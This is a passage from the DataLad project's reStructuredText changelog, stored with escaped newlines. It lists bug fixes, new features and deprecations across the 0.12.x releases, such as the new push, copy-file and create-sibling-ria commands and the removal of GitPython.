<https://github.com/datalad/datalad/issues/4147>`__)\n\n- `update <http://datalad.readthedocs.io/en/latest/generated/man/datalad-update.html>`__\n (`#4159 <https://github.com/datalad/datalad/issues/4159>`__)\n\n - queried the incorrect branch configuration when updating non-annex\n repositories.\n - didn’t account for the fact that the local repository can be\n configured as the upstream “remote” for a branch.\n\n- When the caller included ``--bare`` as a ``git init`` option,\n `create <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create.html>`__\n crashed creating the bare repository, which is currently unsupported,\n rather than aborting with an informative error message.\n (`#4065 <https://github.com/datalad/datalad/issues/4065>`__)\n\n- The logic for automatically propagating the ‘origin’ remote when\n cloning a local source could unintentionally trigger a fetch of a\n non-local remote.\n (`#4196 <https://github.com/datalad/datalad/issues/4196>`__)\n\n- All remaining ``get_submodules()`` call sites that relied on the\n temporary compatibility layer added in v0.12.0 have been updated.\n (`#4348 <https://github.com/datalad/datalad/issues/4348>`__)\n\n- The custom result summary renderer for\n `get <http://datalad.readthedocs.io/en/latest/generated/man/datalad-get.html>`__,\n which was visible with ``--output-format=tailored``, displayed\n incorrect and confusing information in some cases. The custom\n renderer has been removed entirely.\n (`#4471 <https://github.com/datalad/datalad/issues/4471>`__)\n\n- The documentation for the Python interface of a command listed an\n incorrect default when the command overrode the value of command\n parameters such as ``result_renderer``.\n (`#4480 <https://github.com/datalad/datalad/issues/4480>`__)\n\n.. 
_enhancements-and-new-features-15:\n\nEnhancements and new features\n-----------------------------\n\n- The default result renderer learned to elide a chain of results after\n seeing ten consecutive results that it considers similar, which\n improves the display of actions that have many results (e.g., saving\n hundreds of files).\n (`#4337 <https://github.com/datalad/datalad/issues/4337>`__)\n\n- The default result renderer, in addition to “tailored” result\n renderer, now triggers the custom summary renderer, if any.\n (`#4338 <https://github.com/datalad/datalad/issues/4338>`__)\n\n- The new command\n `create-sibling-ria <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create-sibling-ria.html>`__\n provides support for creating a sibling in a `RIA\n store <http://handbook.datalad.org/en/latest/usecases/datastorage_for_institutions.html>`__.\n (`#4124 <https://github.com/datalad/datalad/issues/4124>`__)\n\n- DataLad ships with a new special remote, git-annex-remote-ora, for\n interacting with `RIA\n stores <http://handbook.datalad.org/en/latest/usecases/datastorage_for_institutions.html>`__\n and a new command\n `export-archive-ora <http://datalad.readthedocs.io/en/latest/generated/man/datalad-export-archive-ora.html>`__\n for exporting an archive from a local annex object store.\n (`#4260 <https://github.com/datalad/datalad/issues/4260>`__)\n (`#4203 <https://github.com/datalad/datalad/issues/4203>`__)\n\n- The new command\n `push <http://datalad.readthedocs.io/en/latest/generated/man/datalad-push.html>`__\n provides an alternative interface to\n `publish <http://datalad.readthedocs.io/en/latest/generated/man/datalad-publish.html>`__\n for pushing a dataset hierarchy to a sibling.\n (`#4206 <https://github.com/datalad/datalad/issues/4206>`__)\n (`#4581 <https://github.com/datalad/datalad/issues/4581>`__)\n (`#4617 <https://github.com/datalad/datalad/issues/4617>`__)\n (`#4620 <https://github.com/datalad/datalad/issues/4620>`__)\n\n- The new command\n `copy-file <http://datalad.readthedocs.io/en/latest/generated/man/datalad-copy-file.html>`__\n copies files and associated availability information from one dataset\n to another.\n (`#4430 <https://github.com/datalad/datalad/issues/4430>`__)\n\n- The command examples have been expanded and improved.\n (`#4091 <https://github.com/datalad/datalad/issues/4091>`__)\n (`#4314 <https://github.com/datalad/datalad/issues/4314>`__)\n (`#4464 <https://github.com/datalad/datalad/issues/4464>`__)\n\n- The tooling for linking to the `DataLad\n Handbook <http://handbook.datalad.org>`__ from DataLad’s\n documentation has been improved.\n (`#4046 <https://github.com/datalad/datalad/issues/4046>`__)\n\n- The ``--reckless`` parameter of\n `clone <http://datalad.readthedocs.io/en/latest/generated/man/datalad-clone.html>`__\n and\n `install <http://datalad.readthedocs.io/en/latest/generated/man/datalad-install.html>`__\n learned two new modes:\n\n - “ephemeral”, where the .git/annex/ of the cloned repository is\n symlinked to the local source repository’s.\n (`#4099 <https://github.com/datalad/datalad/issues/4099>`__)\n - “shared-{group|all|…}” that can be used to set up datasets for\n collaborative write access.\n (`#4324 <https://github.com/datalad/datalad/issues/4324>`__)\n\n- `clone <http://datalad.readthedocs.io/en/latest/generated/man/datalad-clone.html>`__\n\n - learned to handle dataset aliases in RIA stores when given a URL\n of the form ``ria+<protocol>://<storelocation>#~<aliasname>``.\n (`#4459 
<https://github.com/datalad/datalad/issues/4459>`__)\n - now checks ``datalad.get.subdataset-source-candidate-NAME`` to see\n if ``NAME`` starts with three digits, which is taken as a “cost”.\n Sources with lower costs will be tried first.\n (`#4619 <https://github.com/datalad/datalad/issues/4619>`__)\n\n- `update <http://datalad.readthedocs.io/en/latest/generated/man/datalad-update.html>`__\n (`#4167 <https://github.com/datalad/datalad/issues/4167>`__)\n\n - learned to disallow non-fast-forward updates when ``ff-only`` is\n given to the ``--merge`` option.\n - gained a ``--follow`` option that controls how ``--merge``\n behaves, adding support for merging in the revision that is\n registered in the parent dataset rather than merging in the\n configured branch from the sibling.\n - now provides a result record for merge events.\n\n- `create-sibling <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create-sibling.html>`__\n now supports local paths as targets in addition to SSH URLs.\n (`#4187 <https://github.com/datalad/datalad/issues/4187>`__)\n\n- `siblings <http://datalad.readthedocs.io/en/latest/generated/man/datalad-siblings.html>`__\n now\n\n - shows a warning if the caller requests to delete a sibling that\n does not exist.\n (`#4257 <https://github.com/datalad/datalad/issues/4257>`__)\n - phrases its warning about non-annex repositories in a less\n alarming way.\n (`#4323 <https://github.com/datalad/datalad/issues/4323>`__)\n\n- The rendering of command errors has been improved.\n (`#4157 <https://github.com/datalad/datalad/issues/4157>`__)\n\n- `save <http://datalad.readthedocs.io/en/latest/generated/man/datalad-save.html>`__\n now\n\n - displays a message to signal that the working tree is clean,\n making it more obvious that no results being rendered corresponds\n to a clean state.\n (`#4106 <https://github.com/datalad/datalad/issues/4106>`__)\n - provides a stronger warning against using ``--to-git``.\n (`#4290 <https://github.com/datalad/datalad/issues/4290>`__)\n\n- `diff <http://datalad.readthedocs.io/en/latest/generated/man/datalad-diff.html>`__\n and\n `save <http://datalad.readthedocs.io/en/latest/generated/man/datalad-save.html>`__\n learned about scenarios where they could avoid unnecessary and\n expensive work.\n (`#4526 <https://github.com/datalad/datalad/issues/4526>`__)\n (`#4544 <https://github.com/datalad/datalad/issues/4544>`__)\n (`#4549 <https://github.com/datalad/datalad/issues/4549>`__)\n\n- Calling\n `diff <http://datalad.readthedocs.io/en/latest/generated/man/datalad-diff.html>`__\n without ``--recursive`` but with a path constraint within a\n subdataset (“/”) now traverses into the subdataset, as “/” would,\n restricting its report to “/”.\n (`#4235 <https://github.com/datalad/datalad/issues/4235>`__)\n\n- New option ``datalad.annex.retry`` controls how many times git-annex\n will retry on a failed transfer. 
It defaults to 3 and can be set to 0\n to restore the previous behavior.\n (`#4382 <https://github.com/datalad/datalad/issues/4382>`__)\n\n- `wtf <http://datalad.readthedocs.io/en/latest/generated/man/datalad-wtf.html>`__\n now warns when the specified dataset does not exist.\n (`#4331 <https://github.com/datalad/datalad/issues/4331>`__)\n\n- The ``repr`` and ``str`` output of the dataset and repo classes got a\n facelift.\n (`#4420 <https://github.com/datalad/datalad/issues/4420>`__)\n (`#4435 <https://github.com/datalad/datalad/issues/4435>`__)\n (`#4439 <https://github.com/datalad/datalad/issues/4439>`__)\n\n- The DataLad Singularity container now comes with p7zip-full.\n\n- DataLad emits a log message when the current working directory is\n resolved to a different location due to a symlink. This is now logged\n at the DEBUG rather than WARNING level, as it typically does not\n indicate a problem.\n (`#4426 <https://github.com/datalad/datalad/issues/4426>`__)\n\n- DataLad now lets the caller know that ``git annex init`` is scanning\n for unlocked files, as this operation can be slow in some\n repositories.\n (`#4316 <https://github.com/datalad/datalad/issues/4316>`__)\n\n- The ``log_progress`` helper learned how to set the starting point to\n a non-zero value and how to update the total of an existing progress\n bar, two features needed for planned improvements to how some\n commands display their progress.\n (`#4438 <https://github.com/datalad/datalad/issues/4438>`__)\n\n- The ``ExternalVersions`` object, which is used to check versions of\n Python modules and external tools (e.g., git-annex), gained an\n ``add`` method that enables DataLad extensions and other third-party\n code to include other programs of interest.\n (`#4441 <https://github.com/datalad/datalad/issues/4441>`__)\n\n- All of the remaining spots that use GitPython have been rewritten\n without it. Most notably, this includes rewrites of the ``clone``,\n ``fetch``, and ``push`` methods of ``GitRepo``.\n (`#4080 <https://github.com/datalad/datalad/issues/4080>`__)\n (`#4087 <https://github.com/datalad/datalad/issues/4087>`__)\n (`#4170 <https://github.com/datalad/datalad/issues/4170>`__)\n (`#4171 <https://github.com/datalad/datalad/issues/4171>`__)\n (`#4175 <https://github.com/datalad/datalad/issues/4175>`__)\n (`#4172 <https://github.com/datalad/datalad/issues/4172>`__)\n\n- When ``GitRepo.commit`` splits its operation across multiple calls to\n avoid exceeding the maximum command line length, it now amends to\n initial commit rather than creating multiple commits.\n (`#4156 <https://github.com/datalad/datalad/issues/4156>`__)\n\n- ``GitRepo`` gained a ``get_corresponding_branch`` method (which\n always returns None), allowing a caller to invoke the method without\n needing to check if the underlying repo class is ``GitRepo`` or\n ``AnnexRepo``.\n (`#4274 <https://github.com/datalad/datalad/issues/4274>`__)\n\n- A new helper function ``datalad.core.local.repo.repo_from_path``\n returns a repo class for a specified path.\n (`#4273 <https://github.com/datalad/datalad/issues/4273>`__)\n\n- New ``AnnexRepo`` method ``localsync`` performs a ``git annex sync``\n that disables external interaction and is particularly useful for\n propagating changes on an adjusted branch back to the main branch.\n (`#4243 <https://github.com/datalad/datalad/issues/4243>`__)\n\n0.12.7 (May 22, 2020) – .\n=========================\n\n.. 
_fixes-14:\n\nFixes\n-----\n\n- Requesting tailored output (``--output=tailored``) from a command\n with a custom result summary renderer produced repeated output.\n (`#4463 <https://github.com/datalad/datalad/issues/4463>`__)\n\n- A longstanding regression in argcomplete-based command-line\n completion for Bash has been fixed. You can enable completion by\n configuring a Bash startup file to run\n ``eval \"$(register-python-argcomplete datalad)\"`` or source\n DataLad’s ``tools/cmdline-completion``. The latter should work for\n Zsh as well.\n (`#4477 <https://github.com/datalad/datalad/issues/4477>`__)\n\n- `publish <http://datalad.readthedocs.io/en/latest/generated/man/datalad-publish.html>`__\n didn’t prevent ``git-fetch`` from recursing into submodules, leading\n to a failure when the registered submodule was not present locally\n and the submodule did not have a remote named ‘origin’.\n (`#4560 <https://github.com/datalad/datalad/issues/4560>`__)\n\n- `addurls <http://datalad.readthedocs.io/en/latest/generated/man/datalad-addurls.html>`__\n botched path handling when the file name format started with “./” and\n the call was made from a subdirectory of the dataset.\n (`#4504 <https://github.com/datalad/datalad/issues/4504>`__)\n\n- Double dash options in manpages were unintentionally escaped.\n (`#4332 <https://github.com/datalad/datalad/issues/4332>`__)\n\n- The check for HTTP authentication failures crashed in situations\n where content came in as bytes rather than unicode.\n (`#4543 <https://github.com/datalad/datalad/issues/4543>`__)\n\n- A check in ``AnnexRepo.whereis`` could lead to a type error.\n (`#4552 <https://github.com/datalad/datalad/issues/4552>`__)\n\n- When installing a dataset to obtain a subdataset,\n `get <http://datalad.readthedocs.io/en/latest/generated/man/datalad-get.html>`__\n confusingly displayed a message that described the containing dataset\n as “underneath” the subdataset.\n (`#4456 <https://github.com/datalad/datalad/issues/4456>`__)\n\n- A couple of Makefile rules didn’t properly quote paths.\n (`#4481 <https://github.com/datalad/datalad/issues/4481>`__)\n\n- With DueCredit support enabled (``DUECREDIT_ENABLE=1``), the query\n for metadata information could flood the output with warnings if\n datasets didn’t have aggregated metadata. The warnings are now\n silenced, with the overall failure of a\n `metadata <http://datalad.readthedocs.io/en/latest/generated/man/datalad-metadata.html>`__\n call logged at the debug level.\n (`#4568 <https://github.com/datalad/datalad/issues/4568>`__)\n\n.. _enhancements-and-new-features-16:\n\nEnhancements and new features\n-----------------------------\n\n- The resource identifier helper learned to recognize URLs with\n embedded Git transport information, such as\n gcrypt::https://example.com.\n (`#4529 <https://github.com/datalad/datalad/issues/4529>`__)\n\n- When running non-interactively, a more informative error is now\n signaled when the UI backend, which cannot display a question, is\n asked to do so.\n (`#4553 <https://github.com/datalad/datalad/issues/4553>`__)\n\n0.12.6 (April 23, 2020) – .\n===========================\n\n.. _major-refactoring-and-deprecations-2:\n\nMajor refactoring and deprecations\n----------------------------------\n\n- The value of ``datalad.support.annexrep.N_AUTO_JOBS`` is no longer\n considered. The variable will be removed in a later release.\n (`#4409 <https://github.com/datalad/datalad/issues/4409>`__)\n\n.. 
_fixes-15:\n\nFixes\n-----\n\n- Starting with v0.12.0, ``datalad save`` recorded the current branch of\n a parent dataset as the ``branch`` value in the .gitmodules entry for\n a subdataset. This behavior is problematic for a few reasons and has\n been reverted.\n (`#4375 <https://github.com/datalad/datalad/issues/4375>`__)\n\n- The default for the ``--jobs`` option, “auto”, instructed DataLad to\n pass a value to git-annex’s ``--jobs`` equal to\n ``min(8, max(3, <number of CPUs>))``, which could lead to issues\n due to the large number of child processes spawned and file\n descriptors opened. To avoid this behavior, ``--jobs=auto`` now\n results in git-annex being called with ``--jobs=1`` by default.\n Configure the new option ``datalad.runtime.max-annex-jobs`` to\n control the maximum value that will be considered when\n ``--jobs='auto'``.\n (`#4409 <https://github.com/datalad/datalad/issues/4409>`__)\n\n- Various commands have been adjusted to better handle the case where a\n remote’s HEAD ref points to an unborn branch.\n (`#4370 <https://github.com/datalad/datalad/issues/4370>`__)\n\n- `search <http://datalad.readthedocs.io/en/latest/generated/man/datalad-search.html>`__\n\n - learned to use the query as a regular expression that restricts\n the keys that are shown for ``--show-keys short``.\n (`#4354 <https://github.com/datalad/datalad/issues/4354>`__)\n - gives a more helpful message when the query is an invalid regular\n expression.\n (`#4398 <https://github.com/datalad/datalad/issues/4398>`__)\n\n- The code for parsing Git configuration did not follow Git’s behavior\n of accepting a key with no value as shorthand for key=true.\n (`#4421 <https://github.com/datalad/datalad/issues/4421>`__)\n\n- ``AnnexRepo.info`` needed a compatibility update for a change in how\n git-annex reports file names.\n (`#4431 <https://github.com/datalad/datalad/issues/4431>`__)\n\n- `create-sibling-github <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create-sibling-github.html>`__\n did not gracefully handle a token that did not have the necessary\n permissions.\n (`#4400 <https://github.com/datalad/datalad/issues/4400>`__)\n\n.. _enhancements-and-new-features-17:\n\nEnhancements and new features\n-----------------------------\n\n- `search <http://datalad.readthedocs.io/en/latest/generated/man/datalad-search.html>`__\n learned to use the query as a regular expression that restricts the\n keys that are shown for ``--show-keys short``.\n (`#4354 <https://github.com/datalad/datalad/issues/4354>`__)\n\n- ``datalad <subcommand>`` learned to point to the\n `datalad-container <https://github.com/datalad/datalad-container>`__\n extension when a subcommand from that extension is given but the\n extension is not installed.\n (`#4400 <https://github.com/datalad/datalad/issues/4400>`__)\n (`#4174 <https://github.com/datalad/datalad/issues/4174>`__)\n\n0.12.5 (Apr 02, 2020) – a small step for datalad …\n==================================================\n\nFix some bugs and make the world an even better place.\n\n.. _fixes-16:\n\nFixes\n-----\n\n- Our ``log_progress`` helper mishandled the initial display and step\n of the progress bar.\n (`#4326 <https://github.com/datalad/datalad/issues/4326>`__)\n\n- ``AnnexRepo.get_content_annexinfo`` is designed to accept\n ``init=None``, but passing that led to an error.\n (`#4330 <https://github.com/datalad/datalad/issues/4330>`__)\n\n- Update a regular expression to handle an output change in Git\n v2.26.0. 
(`#4328 <https://github.com/datalad/datalad/issues/4328>`__)\n\n- We now set ``LC_MESSAGES`` to ‘C’ while running git to avoid failures\n when parsing output that is marked for translation.\n (`#4342 <https://github.com/datalad/datalad/issues/4342>`__)\n\n- The helper for decoding JSON streams loaded the last line of input\n without decoding it if the line didn’t end with a new line, a\n regression introduced in the 0.12.0 release.\n (`#4361 <https://github.com/datalad/datalad/issues/4361>`__)\n\n- The clone command failed to git-annex-init a fresh clone whenever it\n considered to add the origin of the origin as a remote.\n (`#4367 <https://github.com/datalad/datalad/issues/4367>`__)\n\n0.12.4 (Mar 19, 2020) – Windows?!\n=================================\n\nThe main purpose of this release is to have one on PyPi that has no\nassociated wheel to enable a working installation on Windows\n(`#4315 <https://github.com/datalad/datalad/issues/4315>`__).\n\n.. _fixes-17:\n\nFixes\n-----\n\n- The description of the ``log.outputs`` config switch did not keep up\n with code changes and incorrectly stated that the output would be\n logged at the DEBUG level; logging actually happens at a lower level.\n (`#4317 <https://github.com/datalad/datalad/issues/4317>`__)\n\n0.12.3 (March 16, 2020) – .\n===========================\n\nUpdates for compatibility with the latest git-annex, along with a few\nmiscellaneous fixes\n\n.. _major-refactoring-and-deprecations-3:\n\nMajor refactoring and deprecations\n----------------------------------\n\n- All spots that raised a ``NoDatasetArgumentFound`` exception now\n raise a ``NoDatasetFound`` exception to better reflect the situation:\n it is the *dataset* rather than the *argument* that is not found. For\n compatibility, the latter inherits from the former, but new code\n should prefer the latter.\n (`#4285 <https://github.com/datalad/datalad/issues/4285>`__)\n\n.. _fixes-18:\n\nFixes\n-----\n\n- Updates for compatibility with git-annex version 8.20200226.\n (`#4214 <https://github.com/datalad/datalad/issues/4214>`__)\n\n- ``datalad export-to-figshare`` failed to export if the generated\n title was fewer than three characters. It now queries the caller for\n the title and guards against titles that are too short.\n (`#4140 <https://github.com/datalad/datalad/issues/4140>`__)\n\n- Authentication was requested multiple times when git-annex launched\n parallel downloads from the ``datalad`` special remote.\n (`#4308 <https://github.com/datalad/datalad/issues/4308>`__)\n\n- At verbose logging levels, DataLad requests that git-annex display\n debugging information too. Work around a bug in git-annex that\n prevented that from happening.\n (`#4212 <https://github.com/datalad/datalad/issues/4212>`__)\n\n- The internal command runner looked in the wrong place for some\n configuration variables, including ``datalad.log.outputs``, resulting\n in the default value always being used.\n (`#4194 <https://github.com/datalad/datalad/issues/4194>`__)\n\n- `publish <http://datalad.readthedocs.io/en/latest/generated/man/datalad-publish.html>`__\n failed when trying to publish to a git-lfs special remote for the\n first time.\n (`#4200 <https://github.com/datalad/datalad/issues/4200>`__)\n\n- ``AnnexRepo.set_remote_url`` is supposed to establish shared SSH\n connections but failed to do so.\n (`#4262 <https://github.com/datalad/datalad/issues/4262>`__)\n\n.. 
_enhancements-and-new-features-18:\n\nEnhancements and new features\n-----------------------------\n\n- The message provided when a command cannot determine what dataset to\n operate on has been improved.\n (`#4285 <https://github.com/datalad/datalad/issues/4285>`__)\n\n- The “aws-s3” authentication type now allows specifying the host\n through “aws-s3_host”, which was needed to work around an\n authorization error due to a longstanding upstream bug.\n (`#4239 <https://github.com/datalad/datalad/issues/4239>`__)\n\n- The xmp metadata extractor now recognizes “.wav” files.\n\n0.12.2 (Jan 28, 2020) – Smoothen the ride\n=========================================\n\nMostly a bugfix release with various robustifications, but also makes\nthe first step towards versioned dataset installation requests.\n\n.. _major-refactoring-and-deprecations-4:\n\nMajor refactoring and deprecations\n----------------------------------\n\n- The minimum required version for GitPython is now 2.1.12.\n (`#4070 <https://github.com/datalad/datalad/issues/4070>`__)\n\n.. _fixes-19:\n\nFixes\n-----\n\n- The class for handling configuration values, ``ConfigManager``,\n inappropriately considered the current working directory’s dataset,\n if any, for both reading and writing when instantiated with\n ``dataset=None``. This misbehavior is fairly inaccessible through\n typical use of DataLad. It affects ``datalad.cfg``, the top-level\n configuration instance that should not consider repository-specific\n values. It also affects Python users that call ``Dataset`` with a\n path that does not yet exist and persists until that dataset is\n created. (`#4078 <https://github.com/datalad/datalad/issues/4078>`__)\n\n- `update <http://datalad.readthedocs.io/en/latest/generated/man/datalad-update.html>`__\n saved the dataset when called with ``--merge``, which is unnecessary\n and risks committing unrelated changes.\n (`#3996 <https://github.com/datalad/datalad/issues/3996>`__)\n\n- Confusing and irrelevant information about Python defaults have been\n dropped from the command-line help.\n (`#4002 <https://github.com/datalad/datalad/issues/4002>`__)\n\n- The logic for automatically propagating the ‘origin’ remote when\n cloning a local source didn’t properly account for relative paths.\n (`#4045 <https://github.com/datalad/datalad/issues/4045>`__)\n\n- Various fixes to file name handling and quoting on Windows.\n (`#4049 <https://github.com/datalad/datalad/issues/4049>`__)\n (`#4050 <https://github.com/datalad/datalad/issues/4050>`__)\n\n- When cloning failed, error lines were not bubbled up to the user in\n some scenarios.\n (`#4060 <https://github.com/datalad/datalad/issues/4060>`__)\n\n.. 
_enhancements-and-new-features-19:\n\nEnhancements and new features\n-----------------------------\n\n- `clone <http://datalad.readthedocs.io/en/latest/generated/man/datalad-clone.html>`__\n (and thus\n `install <http://datalad.readthedocs.io/en/latest/generated/man/datalad-install.html>`__)\n\n - now propagates the ``reckless`` mode from the superdataset when\n cloning a dataset into it.\n (`#4037 <https://github.com/datalad/datalad/issues/4037>`__)\n - gained support for ``ria+<protocol>://`` URLs that point to\n `RIA <http://handbook.datalad.org/en/latest/usecases/datastorage_for_institutions.html>`__\n stores.\n (`#4022 <https://github.com/datalad/datalad/issues/4022>`__)\n - learned to read “@version” from ``ria+`` URLs and install that\n version of a dataset\n (`#4036 <https://github.com/datalad/datalad/issues/4036>`__) and\n to apply URL rewrites configured through Git’s ``url.*.insteadOf``\n mechanism\n (`#4064 <https://github.com/datalad/datalad/issues/4064>`__).\n - now copies ``datalad.get.subdataset-source-candidate-<name>``\n options configured within the superdataset into the subdataset.\n This is particularly useful for RIA data stores.\n (`#4073 <https://github.com/datalad/datalad/issues/4073>`__)\n\n- Archives are now (optionally) handled with 7-Zip instead of\n ``patool``. 7-Zip will be used by default, but ``patool`` will be\n used on non-Windows systems if the ``datalad.runtime.use-patool``\n option is set or the ``7z`` executable is not found.\n (`#4041 <https://github.com/datalad/datalad/issues/4041>`__)\n\n0.12.1 (Jan 15, 2020) – Small bump after big bang\n=================================================\n\nFix some fallout after major release.\n\n.. _fixes-20:\n\nFixes\n-----\n\n- Revert incorrect relative path adjustment to URLs in\n `clone <http://datalad.readthedocs.io/en/latest/generated/man/datalad-clone.html>`__.\n (`#3538 <https://github.com/datalad/datalad/issues/3538>`__)\n\n- Various small fixes to internal helpers and test to run on Windows\n (`#2566 <https://github.com/datalad/datalad/issues/2566>`__)\n (`#2534 <https://github.com/datalad/datalad/issues/2534>`__)\n\n0.12.0 (Jan 11, 2020) – Krakatoa\n================================\n\nThis release is the result of more than a year of development that\nincludes fixes for a large number of issues, yielding more robust\nbehavior across a wider range of use cases, and introduces major changes\nin API and behavior. It is the first release for which extensive user\ndocumentation is available in a dedicated `DataLad\nHandbook <http://handbook.datalad.org>`__. Python 3 (3.5 and later) is\nnow the only supported Python flavor.\n\nMajor changes 0.12 vs 0.11\n--------------------------\n\n- `save <http://datalad.readthedocs.io/en/latest/generated/man/datalad-save.html>`__\n fully replaces\n `add <http://datalad.readthedocs.io/en/latest/generated/man/datalad-add.html>`__\n (which is obsolete now, and will be removed in a future release).\n\n- A new Git-annex aware\n `status <http://datalad.readthedocs.io/en/latest/generated/man/datalad-status.html>`__\n command enables detailed inspection of dataset hierarchies. 
The\n previously available\n `diff <http://datalad.readthedocs.io/en/latest/generated/man/datalad-diff.html>`__\n command has been adjusted to match\n `status <http://datalad.readthedocs.io/en/latest/generated/man/datalad-status.html>`__\n in argument semantics and behavior.\n\n- The ability to configure dataset procedures prior and after the\n execution of particular commands has been replaced by a flexible\n “hook” mechanism that is able to run arbitrary DataLad commands\n whenever command results are detected that match a specification.\n\n- Support of the Windows platform has been improved substantially.\n While performance and feature coverage on Windows still falls behind\n Unix-like systems, typical data consumer use cases, and standard\n dataset operations, such as\n `create <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create.html>`__\n and\n `save <http://datalad.readthedocs.io/en/latest/generated/man/datalad-save.html>`__,\n are now working. Basic support for data provenance capture via\n `run <http://datalad.readthedocs.io/en/latest/generated/man/datalad-run.html>`__\n is also functional.\n\n- Support for Git-annex direct mode repositories has been removed,\n following the end of support in Git-annex itself.\n\n- The semantics of relative paths in command line arguments have\n changed. Previously, a call\n ``datalad save --dataset /tmp/myds some/relpath`` would have been\n interpreted as saving a file at ``/tmp/myds/some/relpath`` into\n dataset ``/tmp/myds``. This has changed to saving\n ``$PWD/some/relpath`` into dataset ``/tmp/myds``. More generally,\n relative paths are now always treated as relative to the current\n working directory, except for path arguments of\n `Dataset <http://docs.datalad.org/en/latest/generated/datalad.api.Dataset.html>`__\n class instance methods of the Python API. The resulting partial\n duplication of path specifications between path and dataset arguments\n is mitigated by the introduction of two special symbols that can be\n given as dataset argument: ``^`` and ``^.``, which identify the\n topmost superdataset and the closest dataset that contains the\n working directory, respectively.\n\n- The concept of a “core API” has been introduced. Commands situated in\n the module ``datalad.core`` (such as\n `create <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create.html>`__,\n `save <http://datalad.readthedocs.io/en/latest/generated/man/datalad-save.html>`__,\n `run <http://datalad.readthedocs.io/en/latest/generated/man/datalad-run.html>`__,\n `status <http://datalad.readthedocs.io/en/latest/generated/man/datalad-status.html>`__,\n `diff <http://datalad.readthedocs.io/en/latest/generated/man/datalad-diff.html>`__)\n receive additional scrutiny regarding API and implementation, and are\n meant to provide longer-term stability. Application developers are\n encouraged to preferentially build on these commands.\n\nMajor refactoring and deprecations since 0.12.0rc6\n--------------------------------------------------\n\n- `clone <http://datalad.readthedocs.io/en/latest/generated/man/datalad-clone.html>`__\n has been incorporated into the growing core API. The public\n ``--alternative-source`` parameter has been removed, and a\n ``clone_dataset`` function with multi-source capabilities is provided\n instead. 
The ``--reckless`` parameter can now take literal mode\n labels instead of just being a binary flag, but backwards\n compatibility is maintained.\n\n- The ``get_file_content`` method of ``GitRepo`` was no longer used\n internally or in any known DataLad extensions and has been removed.\n (`#3812 <https://github.com/datalad/datalad/issues/3812>`__)\n\n- The function ``get_dataset_root`` has been replaced by\n ``rev_get_dataset_root``. ``rev_get_dataset_root`` remains as a\n compatibility alias and will be removed in a later release.\n (`#3815 <https://github.com/datalad/datalad/issues/3815>`__)\n\n- The ``add_sibling`` module, marked obsolete in v0.6.0, has been\n removed. (`#3871 <https://github.com/datalad/datalad/issues/3871>`__)\n\n- ``mock`` is no longer declared as an external dependency because we\n can rely on it being in the standard library now that our minimum\n required Python version is 3.5.\n (`#3860 <https://github.com/datalad/datalad/issues/3860>`__)\n\n- `download-url <https://datalad.readthedocs.io/en/latest/generated/man/datalad-download-url.html>`__\n now requires that directories be indicated with a trailing slash\n rather than interpreting a path as directory when it doesn’t exist.\n This avoids confusion that can result from typos and makes it\n possible to support directory targets that do not exist.\n (`#3854 <https://github.com/datalad/datalad/issues/3854>`__)\n\n- The ``dataset_only`` argument of the ``ConfigManager`` class is\n deprecated. Use ``source=\"dataset\"`` instead.\n (`#3907 <https://github.com/datalad/datalad/issues/3907>`__)\n\n- The ``--proc-pre`` and ``--proc-post`` options have been removed, and\n configuration values for ``datalad.COMMAND.proc-pre`` and\n ``datalad.COMMAND.proc-post`` are no longer honored. The new result\n hook mechanism provides an alternative for ``proc-post`` procedures.\n (`#3963 <https://github.com/datalad/datalad/issues/3963>`__)\n\nFixes since 0.12.0rc6\n---------------------\n\n- `publish <http://datalad.readthedocs.io/en/latest/generated/man/datalad-publish.html>`__\n crashed when called with a detached HEAD. It now aborts with an\n informative message.\n (`#3804 <https://github.com/datalad/datalad/issues/3804>`__)\n\n- Since 0.12.0rc6 the call to\n `update <http://datalad.readthedocs.io/en/latest/generated/man/datalad-update.html>`__\n in\n `siblings <http://datalad.readthedocs.io/en/latest/generated/man/datalad-siblings.html>`__\n resulted in a spurious warning.\n (`#3877 <https://github.com/datalad/datalad/issues/3877>`__)\n\n- `siblings <http://datalad.readthedocs.io/en/latest/generated/man/datalad-siblings.html>`__\n crashed if it encountered an annex repository that was marked as\n dead. 
(`#3892 <https://github.com/datalad/datalad/issues/3892>`__)\n\n- The update of\n `rerun <https://datalad.readthedocs.io/en/latest/generated/man/datalad-rerun.html>`__\n in v0.12.0rc3 for the rewritten\n `diff <http://datalad.readthedocs.io/en/latest/generated/man/datalad-diff.html>`__\n command didn’t account for a change in the output of ``diff``,\n leading to ``rerun --report`` unintentionally including unchanged\n files in its diff values.\n (`#3873 <https://github.com/datalad/datalad/issues/3873>`__)\n\n- In 0.12.0rc5\n `download-url <https://datalad.readthedocs.io/en/latest/generated/man/datalad-download-url.html>`__\n was updated to follow the new path handling logic, but its calls to\n AnnexRepo weren’t properly adjusted, resulting in incorrect path\n handling when the called from a dataset subdirectory.\n (`#3850 <https://github.com/datalad/datalad/issues/3850>`__)\n\n- `download-url <https://datalad.readthedocs.io/en/latest/generated/man/datalad-download-url.html>`__\n called ``git annex addurl`` in a way that failed to register a URL\n when its header didn’t report the content size.\n (`#3911 <https://github.com/datalad/datalad/issues/3911>`__)\n\n- With Git v2.24.0, saving new subdatasets failed due to a bug in that\n Git release.\n (`#3904 <https://github.com/datalad/datalad/issues/3904>`__)\n\n- With DataLad configured to stop on failure (e.g., specifying\n ``--on-failure=stop`` from the command line), a failing result record\n was not rendered.\n (`#3863 <https://github.com/datalad/datalad/issues/3863>`__)\n\n- Installing a subdataset yielded an “ok” status in cases where the\n repository was not yet in its final state, making it ineffective for\n a caller to operate on the repository in response to the result.\n (`#3906 <https://github.com/datalad/datalad/issues/3906>`__)\n\n- The internal helper for converting git-annex’s JSON output did not\n relay information from the “error-messages” field.\n (`#3931 <https://github.com/datalad/datalad/issues/3931>`__)\n\n- `run-procedure <http://datalad.readthedocs.io/en/latest/generated/man/datalad-run-procedure.html>`__\n reported relative paths that were confusingly not relative to the\n current directory in some cases. It now always reports absolute\n paths. 
